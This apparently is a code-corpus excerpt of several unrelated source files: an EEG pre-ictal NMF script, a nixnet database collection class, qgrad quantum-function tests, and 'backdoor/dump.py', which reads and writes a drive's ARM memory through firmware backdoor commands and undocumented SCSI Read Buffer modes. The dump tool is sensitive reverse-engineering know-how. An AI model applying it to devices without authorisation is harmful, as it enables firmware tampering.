(2, 'Challenge'),
(3, 'Model'),
)
types = forms.MultipleChoiceField(widget=forms.CheckboxSelectMultiple,
choices=PROJECT_TYPES, label='')
| 2.296875 | 2 |
code/04-preictal_nmf.py | akashpattnaik/pre-ictal-similarity | 0 | 12772935 | '''
This script plots spectrograms for pre-ictal periods.
Then, it uses NMF to find subgraphs and expressions for pre-ictal periods.
Finally, it calculates states as the subgraph with maximal expression at each time point
and calculates the dissimilarity between states.
Inputs:
target-electrodes-{mode}.mat
bandpower-windows-pre-sz-{mode}.mat
Outputs:
'''
# %%
# %load_ext autoreload
# %autoreload 2
# Imports and environment setup
import numpy as np
import sys
import os
import pandas as pd
import json
from scipy.io import loadmat
import matplotlib.pyplot as plt
from tqdm import tqdm
from os.path import join as ospj
from scipy.stats import zscore
import time
from kneed import KneeLocator
sys.path.append('tools')
from plot_spectrogram import plot_spectrogram
from movmean import movmean
from pull_sz_starts import pull_sz_starts
from pull_patient_localization import pull_patient_localization
from mpl_toolkits.axes_grid1 import make_axes_locatable
from time2ind import time2ind
from fastdtw import fastdtw
from scipy.spatial.distance import euclidean
from sklearn.decomposition import NMF
from sklearn.metrics.cluster import adjusted_rand_score
import warnings
from sklearn.exceptions import ConvergenceWarning
warnings.filterwarnings(action='ignore', category=ConvergenceWarning)
# Get paths from config file and metadata
with open("config.json") as f:
config = json.load(f)
repo_path = config['repositoryPath']
metadata_path = config['metadataPath']
palette = config['lightColors']
DTW_FLAG = config['flags']["DTW_FLAG"]
electrodes_opt = config['electrodes']
band_opt = config['bands']
data_path = ospj(repo_path, 'data')
figure_path = ospj(repo_path, 'figures')
metadata_fname = ospj(metadata_path, "DATA_MASTER.json")
with open(metadata_fname) as f:
metadata = json.load(f)['PATIENTS']
patient_cohort = pd.read_excel(ospj(data_path, "patient_cohort.xlsx"))
# flags
SAVE_PLOT = True
NMF_OPT_FLAG = True
SUBJ_LEVEL = False
FIXED_PREICTAL_SEC = 60 * config['preictal_window_min']
LEAD_SZ_WINDOW_SEC = (FIXED_PREICTAL_SEC + 60 * 15) # 15 min buffer
# %%
patient_localization_mat = loadmat(ospj(metadata_path, 'patient_localization_final.mat'))['patient_localization']
patients, labels, ignore, resect, gm_wm, coords, region, soz = pull_patient_localization(ospj(metadata_path, 'patient_localization_final.mat'))
for index, row in patient_cohort.iterrows():
if row['Ignore']:
continue
pt = row["Patient"]
print("Calculating pre-ictal NMF for {}".format(pt))
pt_data_path = ospj(data_path, pt)
pt_figure_path = ospj(figure_path, pt)
if not os.path.exists(pt_figure_path):
os.makedirs(pt_figure_path)
# pull and format electrode metadata
electrodes_mat = loadmat(ospj(pt_data_path, "selected_electrodes_elec-{}.mat".format(electrodes_opt)))
target_electrode_region_inds = electrodes_mat['targetElectrodesRegionInds'][0]
pt_index = patients.index(pt)
sz_starts = pull_sz_starts(pt, metadata)
# get bandpower from pre-ictal period and log transform
# bandpower_mat_data = loadmat(ospj(pt_data_path, "bandpower-windows-pre-sz-{}.mat".format(electrodes_opt)))
# bandpower_data = 10*np.log10(bandpower_mat_data['allFeats'])
# t_sec = np.squeeze(bandpower_mat_data['entireT']) / 1e6
# sz_id = np.squeeze(bandpower_mat_data['szID'])
df = pd.read_pickle(ospj(pt_data_path, "bandpower_elec-{}_period-preictal.pkl".format(electrodes_opt)))
if band_opt == "all":
bandpower_data = df.filter(regex=("^((?!broad).)*$"), axis=1)
bandpower_data = bandpower_data.drop(['Seizure id'], axis=1)
elif band_opt == "broad":
bandpower_data = df.filter(regex=("broad"), axis=1)
else:
print("Band configuration not given properly")
exit
sz_id = np.squeeze(df['Seizure id'])
t_sec = np.array(df.index / np.timedelta64(1, 's'))
n_sz = np.size(np.unique(sz_id))
# remove short inter-seizure intervals
lead_sz = np.diff(np.insert(sz_starts, 0, [0])) > (FIXED_PREICTAL_SEC + 60 * 15) # 15 min buffer
remaining_sz_ids = np.where(lead_sz)[0]
remove_sz_ids = np.where(~lead_sz)[0]
print("\tremoving seizures {}".format(remove_sz_ids))
print(type(sz_id))
for remv in remove_sz_ids:
t_sec = np.delete(t_sec, np.where(sz_id == remv))
bandpower_data.drop(bandpower_data.index[np.where(sz_id == remv)[0]], inplace=True)
sz_id.drop(sz_id.index[np.where(sz_id == remv)[0]], inplace=True)
np.save(ospj(pt_data_path, "remaining_sz_ids.npy"), remaining_sz_ids)
# Apply NMF to pre-ictal period to find components (H) and expression (W)
n_remaining_sz = np.size(remaining_sz_ids)
n_components = range(2, 20)
for sz_idx in tqdm(range(n_remaining_sz)):
i_sz = remaining_sz_ids[sz_idx]
data = bandpower_data[sz_id == i_sz]
# print("\trunning NMF")
start_time = time.time()
reconstruction_err = np.zeros(np.size(n_components))
for ind, i_components in enumerate(n_components):
# print("\t\tTesting NMF with {} components".format(i_components))
model = NMF(n_components=i_components, init='nndsvd', random_state=0, max_iter=1000)
W = model.fit_transform(data - np.min(data))
reconstruction_err[ind] = model.reconstruction_err_
end_time = time.time()
# print("\tNMF took {} seconds".format(end_time - start_time))
kneedle = KneeLocator(n_components, reconstruction_err, curve="convex", direction="decreasing")
n_opt_components = kneedle.knee
# print("\t{} components was found as optimal, rerunning for final iteration".format(n_opt_components))
model = NMF(n_components=n_opt_components, init='nndsvd', random_state=0, max_iter=1000)
W = model.fit_transform(data - np.min(data))
H = model.components_
np.save(ospj(pt_data_path, "nmf_expression_band-{}_elec-{}_sz-{}.npy".format(band_opt, electrodes_opt, i_sz)), W)
np.save(ospj(pt_data_path, "nmf_components_band-{}_elec-{}_sz-{}.npy".format(band_opt, electrodes_opt, i_sz)), H)
np.save(ospj(pt_data_path, "lead_sz_t_sec_band-{}_elec-{}.npy".format(band_opt, electrodes_opt)), t_sec)
np.save(ospj(pt_data_path, "lead_sz_sz_id_band-{}_elec-{}.npy".format(band_opt, electrodes_opt)), sz_id)
##############################################
# %%
# # States are defined as the max expressed component at each time point
# states = np.argmax(movmean(W[:, 1:].T, k=100).T, axis=-1) + 1
# # take the dissimilarity in states, optionally using fast dynamic time warping
# if DTW_FLAG:
# states_dissim_mat = np.zeros((n_remaining_sz, n_remaining_sz))
# for ind1, i in enumerate(remaining_sz_ids):
# for ind2, j in enumerate(remaining_sz_ids):
# distance, path = fastdtw(states[sz_id == i], states[sz_id == j], dist=euclidean)
# states_dissim_mat[ind1, ind2] = distance
# else:
# # find how long pre-ictal segments are for each sz and take shortest one
# pre_ictal_lengths = np.zeros(remaining_sz_ids.shape, dtype=int)
# for ind, i_sz in enumerate(remaining_sz_ids):
# pre_ictal_lengths[ind] = np.size(states[sz_id == i_sz])
# pre_ictal_length = np.min(pre_ictal_lengths)
# # matrix of adjusted rand score for similar state occurences
# states_dissim_mat = np.zeros((n_remaining_sz, n_remaining_sz))
# for ind1, i in enumerate(remaining_sz_ids):
# for ind2, j in enumerate(remaining_sz_ids):
# rand = adjusted_rand_score(states[sz_id == i][-pre_ictal_length:], states[sz_id == j][-pre_ictal_length:])
# states_dissim_mat[ind1, ind2] = 1 - rand
# np.save(ospj(pt_data_path, "states_dissim_mat_{}.npy".format(mode)), states_dissim_mat)
# np.save(ospj(pt_data_path, "remaining_sz_ids.npy"), remaining_sz_ids)
# # Plot the NMF subgraphs and expression
# if PLOT:
# for i in remaining_sz_ids:
# fig, ax = plt.subplots()
# t_arr_min = (t_sec[sz_id == i] - t_sec[sz_id == i][-1]) / 60
# ax.plot(t_arr_min, movmean(W[sz_id == i, 1:].T, k=100, mode='same').T)
# ax.set_xlabel("Time from seizure onset (min)")
# ax.set_ylabel("Subgraph coefficient")
# ax.set_title("Seizure {}".format(i))
# ax.legend(np.arange(n_components - 1) + 2, title="Component")
# if SAVE_PLOT:
# plt.savefig(ospj(pt_figure_path, "subgraph_expression_sz_{}_{}.svg".format(i, mode)), bbox_inches='tight', transparent='true')
# plt.savefig(ospj(pt_figure_path, "subgraph_expression_sz_{}_{}.png".format(i, mode)), bbox_inches='tight', transparent='true')
# plt.close()
# ax = plot_spectrogram(H, start_time=0, end_time=n_components)
# ax.set_title("{}".format(pt))
# ax.set_xlabel("Component")
# if SAVE_PLOT:
# plt.savefig(ospj(pt_figure_path, "subgraphs_{}.svg".format(mode)), bbox_inches='tight', transparent='true')
# plt.savefig(ospj(pt_figure_path, "subgraphs_{}.png".format(mode)), bbox_inches='tight', transparent='true')
# plt.close()
# if PLOT:
# n_electrodes = soz_electrodes.shape[0]
# # plot all states
# component_arr = np.reshape(H, (n_components, -1, n_electrodes))
# # component_z = np.zeros(component_arr.shape)
# # for i_comp in range(n_components):
# # component_z[i_comp, :, :] = zscore(component_arr[i_comp, :, :], axis=1)
# # sort to put non-soz first
# sort_soz_inds = np.argsort(soz_electrodes)
# n_soz = np.sum(soz_electrodes)
# n_non_soz = n_electrodes - n_soz
# for i_comp in range(n_components):
# fig, ax = plt.subplots()
# divider = make_axes_locatable(ax)
# cax = divider.append_axes('right', size='5%', pad=0.05)
# im = ax.imshow(component_arr[i_comp, :, sort_soz_inds].T)
# ax.axvline(n_non_soz - 0.5, c='r', lw=2)
# ax.set_title("Subgraph {}, {}".format(i_comp, pt))
# ax.set_yticks(np.arange(6))
# ax.set_yticklabels([r'$\delta$', r'$\theta$', r'$\alpha$', r'$\beta$', r'low-$\gamma$', r'high-$\gamma$'])
# ax.set_xticks(np.arange(n_electrodes))
# ax.set_xticks([n_non_soz / 2, n_non_soz + n_soz / 2])
# ax.set_xticklabels(["Non SOZ", "SOZ"])
# ax.set_xlabel("Electrodes")
# ax.set_ylabel("Frequency band")
# cbar = fig.colorbar(im, cax=cax, orientation='vertical')
# cbar.ax.set_ylabel('Power (dB)', rotation=90)
# if SAVE_PLOT:
# plt.savefig(ospj(pt_figure_path, "soz_subgraph_{}_heatmap_{}.svg".format(i_comp, mode)), bbox_inches='tight', transparent='true')
# plt.savefig(ospj(pt_figure_path, "soz_subgraph_{}_heatmap_{}.png".format(i_comp, mode)), bbox_inches='tight', transparent='true')
# plt.close()
# # plot soz state expression for all seizures
# for i in remaining_sz_ids:
# fig, ax = plt.subplots()
# t_arr_min = (t_sec[sz_id == i] - t_sec[sz_id == i][-1]) / 60
# ax.plot(t_arr_min, movmean(W[sz_id == i,pt_soz_state].T, k=100).T)
# ax.set_xlabel("Time from seizure onset (min)")
# ax.set_ylabel("SOZ subgraph coefficient")
# ax.set_title("Seizure {}".format(i))
# if SAVE_PLOT:
# plt.savefig(ospj(pt_figure_path, "soz_expression_sz_{}_{}.svg".format(i, mode)), bbox_inches='tight', transparent='true')
# plt.savefig(ospj(pt_figure_path, "soz_expression_sz_{}_{}.png".format(i, mode)), bbox_inches='tight', transparent='true')
# plt.close()
# break
# # %%
# min_pre_ictal_size = min([W[sz_id == i,pt_soz_state].shape[0] for i in remaining_sz_ids])
# pre_ictal_soz_state = np.zeros((np.size(remaining_sz_ids), min_pre_ictal_size))
# for ind, i_sz in enumerate(remaining_sz_ids):
# pre_ictal_soz_state[ind, :] = W[sz_id == i_sz,pt_soz_state][-min_pre_ictal_size:]
# # %%
# # %%
| 2.53125 | 3 |
backdoor/dump.py | alu96/coastermelt | 0 | 12772936 | #!/usr/bin/env python
import sys, struct, time
# Use on the command line to interactively dump regions of memory.
# Or import as a library for higher level dumping functions.
__all__ = [
'words_from_string',
'poke_words', 'poke_words_from_string', 'poke_bytes',
'read_block', 'scsi_read_buffer',
'hexdump', 'hexdump_words',
'dump', 'dump_words',
'search_block'
]
class progress_reporter:
"""A simple console progress reporter for memory operations.
Totally invisible unless the operation is taking longer than the
reporting interval. At that point, we'll update the status at
most that often. Always writes a final status at completion if
we had any status output at all before that point.
"""
def __init__(self, message, reporting_interval = 0.2, enabled = True):
self.message = message
self.reporting_interval = reporting_interval
self.enabled = enabled
self.first_timestamp = time.time()
self.output_timestamp = None
def mandatory_update(self, current, total):
sys.stdout.write("\r %d / %d %s " % (current, total, self.message))
sys.stdout.flush()
self.output_timestamp = time.time()
def update(self, current, total):
if self.enabled:
latest = self.output_timestamp or self.first_timestamp
if time.time() > latest + self.reporting_interval:
# Enough time has passed
self.mandatory_update(current, total)
def complete(self, current, total):
# Write a final status if we had any output
if self.output_timestamp:
self.mandatory_update(current, total)
sys.stdout.write('\n')
sys.stdout.flush()
def words_from_string(s, padding_byte = chr(255)):
"""A common conversion to give a list of integers from a little endian string.
Uses the indicated padding byte if the string isn't a word multiple.
"""
residual = len(s) & 3
if residual:
s += padding_byte * (4 - residual)
return struct.unpack('<%dI' % (len(s)/4), s)
def poke_words_from_string(d, address, s):
poke_words(d, address, words_from_string(s))
def poke_words(d, address, words, verbose = True, reporting_interval = 0.1):
"""Send a block of words (slowly)"""
progress = progress_reporter('words sent',
enabled=verbose, reporting_interval=reporting_interval)
l = len(words)
for i, w in enumerate(words):
d.poke(address + 4*i, w)
progress.update(i+1, l)
progress.complete(l, l)
def poke_bytes(d, address, bytes, verbose = True, reporting_interval = 0.1):
"""Send a block of bytes (VERY slowly)"""
progress = progress_reporter('bytes sent',
enabled=verbose, reporting_interval=reporting_interval)
l = len(bytes)
for i, w in enumerate(bytes):
d.poke_byte(address + i, w)
progress.update(i+1, l)
progress.complete(l, l)
def scsi_read_buffer(d, mode, address, size):
"""Use the SCSI 'Read Buffer' command to grab a block of data quickly.
The bootloader and TS01 firmware implement a version of this command
with mode 6 mapped to ARM memory (low 16MB only) and mode 2 mapped
to something we'll call DMA memory.
"""
return d.scsi_in(''.join(map(chr, [
0x3c, mode, 0,
(address >> 16) & 0xff,
(address >> 8) & 0xff,
(address >> 0) & 0xff,
(size >> 16) & 0xff,
(size >> 8) & 0xff,
(size >> 0) & 0xff,
0,0,0 ])), size)
def read_word_aligned_block(d, address, size,
verbose = True, reporting_interval = 0.2,
max_round_trips = None, fast = False, addr_space = 'arm'):
# Implementation detail for read_block
assert (address & 3) == 0
assert (size & 3) == 0
i = 0
parts = []
progress = progress_reporter('bytes read',
enabled=verbose, reporting_interval=reporting_interval)
while i < size:
wordcount = min(size - i, 64*1024) / 4
dram_address = (address - 0x1c08000) & 0xffffffff
if addr_space == 'dma' and hasattr(d, 'scsi_in'):
# Undocumented SCSI command that reads some kind of DMA memory space.
# Begins with DRAM, but starts doing other things around 0x368500.
part = scsi_read_buffer(d, 2, address + i, wordcount * 4)
elif fast and hasattr(d, 'scsi_in') and addr_space == 'arm' and dram_address + i <= 0x368000:
# Use the DMA reads, where we can, to implement fast DRAM reads.
part = scsi_read_buffer(d, 2, address - 0x1c08000 + i, wordcount * 4)
elif fast and hasattr(d, 'scsi_in') and addr_space == 'arm' and address + i <= 0x200000:
# Undocumented SCSI command that copies data from flash addresses
# via the ARM to DRAM and DMA's it out to SCSI. Very fast, handles
# addreses (including RAM mappings) below 2MB.
wordcount = min(wordcount, 64 * 1024 / 4)
part = scsi_read_buffer(d, 6, address + i, wordcount * 4)
elif addr_space == 'arm':
part = d.read_block(address + i, wordcount)
else:
raise ValueError("Don't know how to read address %08x in %r memory" % (address, addr_space))
assert (len(part) & 3) == 0
i += len(part)
parts.append(part)
if max_round_trips and len(parts) >= max_round_trips:
break
progress.update(i, size)
progress.complete(i, size)
return ''.join(parts)
def read_block(d, address, size, max_round_trips = None, fast = False, addr_space = 'arm'):
"""Read a block of memory, return it as a string.
Reads using LDR (word-aligned) reads only. The requested block
does not need to be aligned.
If max_round_trips is set, we stop after that many round-trip
commands to the device. This can be used for real-time applications
where it may be better to have some data soon than all the data later.
If 'fast' is set, this uses a much faster DMA-based approach that probably
doesn't work in all cases.
"""
# Convert to half-open interval [address, end)
# Round beginning of interval down to nearest word
# Round end of interval up to nearest word
end = address + size
word_address = address & ~3
word_end = (end + 3) & ~3
word_size = word_end - word_address
# Where in the larger interval is our original block?
sub_begin = address - word_address
sub_end = sub_begin + size
return read_word_aligned_block(d, word_address, word_size,
max_round_trips=max_round_trips, fast=fast, addr_space=addr_space
)[sub_begin:sub_end]
def search_block(d, address, size, substring,
context_length = 16, fast = False, addr_space = 'arm'):
"""Read a block of ARM memory, and search for all occurrences of a byte string.
Yields tuples every time a match is found:
(address, context_before, context_after)
"""
# We may have a way to do this gradually later, but for now we read all at once
# then search all at once.
block = read_block(d, address, size, fast=fast, addr_space=addr_space)
offset = 0
while True:
offset = block.find(substring, offset)
if offset < 0:
break
yield (
address + offset,
block[max(0, offset - context_length):offset],
block[offset + len(substring):offset + len(substring) + context_length]
)
offset += len(substring)
def hexdump(src, length = 16, address = 0, log_file = None):
if log_file:
f = open(log_file, 'wb')
f.write(src)
f.close()
# Based on https://gist.github.com/sbz/1080258
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
lines = []
for c in xrange(0, len(src), length):
chars = src[c:c+length]
hex = ' '.join(["%02x" % ord(x) for x in chars])
printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
lines.append("%08x %-*s %s\n" % (address + c, length*3, hex, printable))
return ''.join(lines)
def hexdump_words(src, words_per_line = 8, address = 0, log_file = None):
if log_file:
f = open(log_file, 'wb')
f.write(src)
f.close()
assert (address & 3) == 0
assert (len(src) & 3) == 0
words = words_from_string(src)
lines = []
for c in xrange(0, len(words), words_per_line):
w = words[c:c+words_per_line]
hex = ' '.join(["%08x" % i for i in w])
lines.append("%08x %-*s\n" % (address + c*4, words_per_line*9, hex))
return ''.join(lines)
def dump(d, address, size, log_file = 'result.log', fast = False, check_fast = False, addr_space = 'arm'):
data = read_block(d, address, size, fast=fast, addr_space=addr_space)
if check_fast:
assert read_block(d, address, size, fast=not fast, addr_space=addr_space) == data
sys.stdout.write(hexdump(data, 16, address, log_file))
def dump_words(d, address, wordcount, log_file = 'result.log', fast = False, addr_space = 'arm'):
data = read_block(d, address, wordcount * 4, fast=fast, addr_space=addr_space)
sys.stdout.write(hexdump_words(data, 8, address, log_file))
if __name__ == "__main__":
import remote
if len(sys.argv) != 3:
print "usage: %s address size" % sys.argv[0]
sys.exit(1)
dump(remote.Device(),
int(sys.argv[1].replace('_',''), 16),
int(sys.argv[2].replace('_',''), 16))
| 3 | 3 |
nixnet/database/_collection.py | ni-ldp/nixnet-python | 16 | 12772937 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import typing # NOQA: F401
import six
from nixnet import _cprops
from nixnet import _funcs
from nixnet import constants # NOQA: F401
from nixnet.database import _database_object # NOQA: F401
class DbCollection(collections.Mapping):
"""Collection of database objects."""
def __init__(self, handle, db_type, prop_id, factory):
# type: (int, constants.ObjectClass, int, typing.Any) -> None
self._handle = handle
self._type = db_type
self._prop_id = prop_id
self._factory = factory
def __repr__(self):
return '{}(handle={}, db_type={})'.format(type(self).__name__, self._handle, self._type)
def __eq__(self, other):
if isinstance(other, self.__class__):
sys_other = typing.cast(DbCollection, other)
return self._handle == sys_other._handle and self._prop_id == sys_other._prop_id
else:
return NotImplemented
def __ne__(self, other):
result = self.__eq__(other)
if result is NotImplemented:
return result
else:
return not result
def __hash__(self):
return hash(self._handle)
def __len__(self):
return _cprops.get_database_ref_array_len(self._handle, self._prop_id)
def __iter__(self):
return self.keys()
def __getitem__(self, index):
"""Return the database object.
Args:
Name of database object
Returns:
index(str): Name of database object.
"""
if isinstance(index, six.string_types):
ref = _funcs.nxdb_find_object(self._handle, self._type, index)
return self._factory(_handle=ref)
else:
raise TypeError(index)
def __delitem__(self, index):
ref = _funcs.nxdb_find_object(self._handle, self._type, index)
_funcs.nxdb_delete_object(ref)
def keys(self):
"""Return database object names in the collection.
Yields:
An iterator to database object names in the collection.
"""
for child in self._get_children():
yield child.name
def values(self):
"""Return database objects in the collection.
Yields:
An iterator to database objects in the collection.
"""
return self._get_children()
def items(self):
"""Return all database object names and objects in the collection.
Yields:
An iterator to tuple pairs of database object names and objects in the collection
"""
for child in self._get_children():
yield child.name, child
def add(self, name):
# type: (typing.Text) -> _database_object.DatabaseObject
"""Add a new database object to the collection.
Args:
name(str): Name of the new database object.
Returns:
``DatabaseObject``: An instance of the new database object.
"""
ref = _funcs.nxdb_create_object(self._handle, self._type, name)
return self._factory(_handle=ref)
def _get_children(self):
for ref in _cprops.get_database_ref_array(self._handle, self._prop_id):
yield self._factory(_handle=ref)
| 2.046875 | 2 |
qgrad/tests/test_qgrad_qutip.py | quantshah/qgrad | 37 | 12772938 | <reponame>quantshah/qgrad
"""Tests for qgrad implementation of qutip functions"""
from numpy.testing import (
assert_almost_equal,
assert_array_equal,
assert_array_almost_equal,
assert_equal,
assert_raises,
)
from jax import grad
import jax.numpy as jnp
from jax.random import PRNGKey, split, uniform
import pytest
from qutip import rand_ket, rand_dm, rand_herm
import numpy as np
import scipy
from qgrad.qgrad_qutip import (
basis,
coherent,
create,
dag,
Displace,
destroy,
expect,
fidelity,
isbra,
isdm,
isket,
isherm,
_make_rot,
rand_unitary,
rand_ket as qgrad_rand_ket,
rand_dm as qgrad_rand_dm,
to_dm,
sigmax,
sigmay,
sigmaz,
squeeze,
to_dm,
Unitary,
)
def test_fidelity():
"""
Tests the fidelity function and computation of its gradient
"""
ket0 = jnp.array([[1.0], [0]]) # represents |0>
ket1 = jnp.array([[0.0], [1]]) # represents |1>
ket_plus = 1 / jnp.sqrt(2) * (ket0 + ket1) # represents |+>
ket_minus = 1 / jnp.sqrt(2) * (ket0 - ket1) # represents |->
ket_complx = rand_ket(2).full()
assert fidelity(ket0, ket1) == 0.0
assert fidelity(ket0, ket0) == 1.0
assert fidelity(ket1, ket1) == 1.0
assert_almost_equal(fidelity(ket_plus, ket_minus), 0.0)
assert fidelity(rand_ket(4).full(), rand_ket(4).full()) <= 1.0
assert fidelity(rand_ket(10).full(), rand_ket(10).full()) >= 0.0
assert np.isclose(fidelity(ket_complx, ket_complx), 1.0)
assert_almost_equal(fidelity(ket_plus, ket0), 1.0 / 2.0)
assert_almost_equal(fidelity(ket_plus, ket1), 1.0 / 2.0)
assert_almost_equal(fidelity(ket0, ket_minus), 1.0 / 2.0)
assert_almost_equal(fidelity(ket1, ket_minus), 1.0 / 2.0)
def test_fidelity_max_dm():
"""Tests for density matrices with respect to themselves to be equal to 1 (max)"""
for _ in range(10):
rho1 = jnp.asarray(rand_dm(25))
rho2 = jnp.asarray(rand_dm(25))
assert_almost_equal(fidelity(rho1, rho1), 1.0, decimal=4)
assert_almost_equal(fidelity(rho2, rho2), 1.0, decimal=4)
def test_fidelity_max_ket():
"""Tests for ket states with respect to themselves to be equal to 1 (max)"""
for _ in range(10):
ket1 = jnp.asarray(rand_ket(25))
ket2 = jnp.asarray(rand_ket(25))
assert_almost_equal(fidelity(ket1, ket1), 1.0, decimal=6)
assert_almost_equal(fidelity(ket2, ket2), 1.0, decimal=6)
def test_fidelity_bounded_mixedmixed(tol=1e-7):
"""Tests for boundedness of fidelity among mixed states to be between [0, 1]"""
for _ in range(10):
rho1 = jnp.asarray(rand_dm(25))
rho2 = jnp.asarray(rand_dm(25))
F = fidelity(rho1, rho2)
assert -tol <= F <= 1 + tol
def test_fidelity_bounded_puremixed(tol=1e-7):
for _ in range(10):
rho1 = jnp.asarray(rand_dm(25))
ket1 = jnp.asarray(rand_ket(25))
F = fidelity(rho1, ket1)
assert -tol <= F <= 1 + tol
def test_fidelity_bounded_purepure(tol=1e-7):
"""Tests for boundedness of fidelity among kets to be between [0, 1]"""
for _ in range(10):
ket1 = jnp.asarray(rand_ket(25))
ket2 = jnp.asarray(rand_ket(25))
F = fidelity(ket1, ket2)
assert -tol <= F <= 1 + tol
def test_basis():
"""Tests the `basis` method"""
np_arr = np.zeros((4, 1), dtype=np.complex64)
np_arr[2, 0] = 1.0
assert np.array_equal(basis(4, 2), jnp.asarray(np_arr))
def test_destroy():
"""Tests the annihilation/destroy/lowering operator"""
# Destruction operator annihilates the bosonic number state
b9 = basis(10, 9) # Fock/number state with 1 at 9th index
d10 = destroy(10) # 10-dimensional destroy operator
lowered = jnp.dot(d10, b9)
assert_array_almost_equal(lowered, 3.0 * basis(10, 8))
d3 = destroy(3)
matrix3 = jnp.asarray(
[
[0.00000000 + 0.0j, 1.00000000 + 0.0j, 0.00000000 + 0.0j],
[0.00000000 + 0.0j, 0.00000000 + 0.0j, 1.41421356 + 0.0j],
[0.00000000 + 0.0j, 0.00000000 + 0.0j, 0.00000000 + 0.0j],
]
)
assert_equal(np.allclose(matrix3, d3), True)
assert_equal(np.allclose(dag(destroy(3)), create(3)), True)
def test_create():
"""Tests for the creation operator"""
b3 = basis(5, 3)
c5 = create(5)
raised = jnp.dot(c5, b3)
assert_equal(np.allclose(raised, 2.0 * basis(5, 4)), True)
c3 = create(3)
matrix3 = jnp.asarray(
[
[0.00000000 + 0.0j, 0.00000000 + 0.0j, 0.00000000 + 0.0j],
[1.00000000 + 0.0j, 0.00000000 + 0.0j, 0.00000000 + 0.0j],
[0.00000000 + 0.0j, 1.41421356 + 0.0j, 0.00000000 + 0.0j],
]
)
assert_equal(np.allclose(matrix3, c3), True)
def test_sigmax():
assert_array_equal(sigmax(), jnp.array([[0.0, 1.0], [1.0, 0.0]]))
def test_sigmay():
assert_array_equal(
sigmay(), jnp.array([[0.0 + 0.0j, 0.0 - 1.0j], [0.0 + 1.0j, 0.0 + 0.0j]])
)
def test_sigmaz():
assert_array_equal(sigmaz(), jnp.array([[1.0, 0.0], [0.0, -1.0]]))
@pytest.mark.parametrize("op", [sigmax(), sigmay(), sigmaz()])
@pytest.mark.parametrize("state", [basis(2, 0), basis(2, 1)])
def test_expect_sigmaxyz(op, state):
"""Tests the `expect` function on Pauli-X, Pauli-Y and Pauli-Z."""
# The stacked pytest decorators check all the argument combinations like a Cartesian product
if jnp.all(op != sigmaz()):
assert expect(op, state) == 0.0
elif jnp.all(state == basis(2, 0)):
assert expect(op, state) == 1.0
else:
assert expect(op, state) == -1.0
@pytest.mark.parametrize(
"oper, state",
[
(rand_herm(2).full(), basis(2, 0)),
(rand_herm(4).full(), basis(4, 0)),
(rand_herm(20).full(), basis(20, 20)),
],
)
def test_expect_herm(oper, state):
"""Tests that the expectation value of a hermitian operator is real and that of
the non-hermitian operator is complex"""
assert jnp.imag(expect(oper, state)) == 0.0
@pytest.mark.parametrize(
"oper, state",
[
(rand_herm(5).full(), rand_ket(5).full()),
(rand_dm(5).full(), rand_ket(5).full()),
],
)
def test_expect_dag(oper, state):
r"""Reconciles the expectation value of a random operator with the analytic calculation
.. math:: <A> = <\psi|A|\psi>
"""
expected = jnp.dot(jnp.dot(dag(state), oper), state)
assert abs(expect(oper, state) - expected) < 1e-6
def test_coherent():
"""Tests the coherent state method"""
assert abs(expect(destroy(10), coherent(10, 0.5)) - 0.5) < 1e-4
# Tests the border case with alpha = 0
for N in range(2, 30, 5):
assert_array_almost_equal(coherent(N, 0), basis(N, 0))
def test_dag_ket():
r"""Tests the dagger operation :math:`A^{\dagger}` on operator :math:`A`"""
# test with all real entries
assert_array_equal(dag(basis(2, 0)), [[1.0, 0.0]])
assert_array_equal(dag(basis(2, 1)), [[0.0, 1.0]])
# test with all complex entries
ket1 = jnp.array(
[
[0.04896761 + 0.18014458j],
[0.6698803 + 0.13728367j],
[-0.07598839 + 0.38113445j],
[-0.00505985 + 0.10700243j],
[-0.18735261 + 0.5476768j],
],
dtype=jnp.complex64,
)
ket1_dag = jnp.array(
[
[
0.04896761 - 0.18014458j,
0.6698803 - 0.13728367j,
-0.07598839 - 0.38113445j,
-0.00505985 - 0.10700243j,
-0.18735261 - 0.5476768j,
]
],
dtype=jnp.complex64,
)
assert_array_equal(dag(ket1), ket1_dag)
@pytest.mark.repeat(10)
def test_dag_dot():
"""Tests the dagger operation with dot product"""
i = np.random.randint(3, 10)
ket = rand_ket(i).full()
assert_almost_equal(jnp.dot(dag(ket), ket), 1.0)
def test_isket():
"""Tests the `isket` method to see whether a state is a ket based on its shape"""
for i in range(2, 6):
assert isket(rand_ket(i).full()) == True # tests kets
for j in range(2, 6):
assert isket(dag(rand_ket(j).full())) == False # tests bras
for k in range(2, 6):
assert isket(rand_dm(k).full()) == False # tests density matrices
def test_isbra():
"""Tests the `isbra` method to see whether a state is a bra based on its shape"""
for i in range(2, 6):
assert isbra(rand_ket(i).full()) == False # tests kets
for j in range(2, 6):
assert isbra(dag(rand_ket(j).full())) == True # tests bras
for k in range(2, 6):
assert isbra(rand_dm(k).full()) == False # tests density matrices
def test_to_dm():
"""Tests the `to_dm` method that converts kets and bras to density matrices"""
dm0 = jnp.array(
[[1.0 + 0.0j, 0.0 + 0.0j], [0.0 + 0.0j, 0.0 + 0.0j]], dtype=jnp.complex64
)
dm1 = jnp.array(
[[0.0 + 0.0j, 0.0 + 0.0j], [0.0 + 0.0j, 1.0 + 0.0j]], dtype=jnp.complex64
)
# testing kets
assert_array_equal(to_dm(basis(2, 0)), dm0)
assert_array_equal(to_dm(basis(2, 1)), dm1)
# testing bras
assert_array_equal(to_dm(dag(basis(2, 0))), dm0)
assert_array_equal(to_dm(dag(basis(2, 1))), dm1)
def test_squeeze():
"""Tests the squeeze operator"""
sq = squeeze(4, 0.1 + 0.1j)
sqmatrix = jnp.array(
[
[
0.99500417 + 0.0j,
0.00000000 + 0.0j,
0.07059289 - 0.07059289j,
0.00000000 + 0.0j,
],
[
0.00000000 + 0.0j,
0.98503746 + 0.0j,
0.00000000 + 0.0j,
0.12186303 - 0.12186303j,
],
[
-0.07059289 - 0.07059289j,
0.00000000 + 0.0j,
0.99500417 + 0.0j,
0.00000000 + 0.0j,
],
[
0.00000000 + 0.0j,
-0.12186303 - 0.12186303j,
0.00000000 + 0.0j,
0.98503746 + 0.0j,
],
],
dtype=jnp.complex64,
)
assert_equal(np.allclose(sq, sqmatrix), True)
class TestDisplace:
"""A test class for the displace operator"""
def test_displace(self):
dp = Displace(4)
dpmatrix = jnp.array(
[
[
0.96923323 + 0.0j,
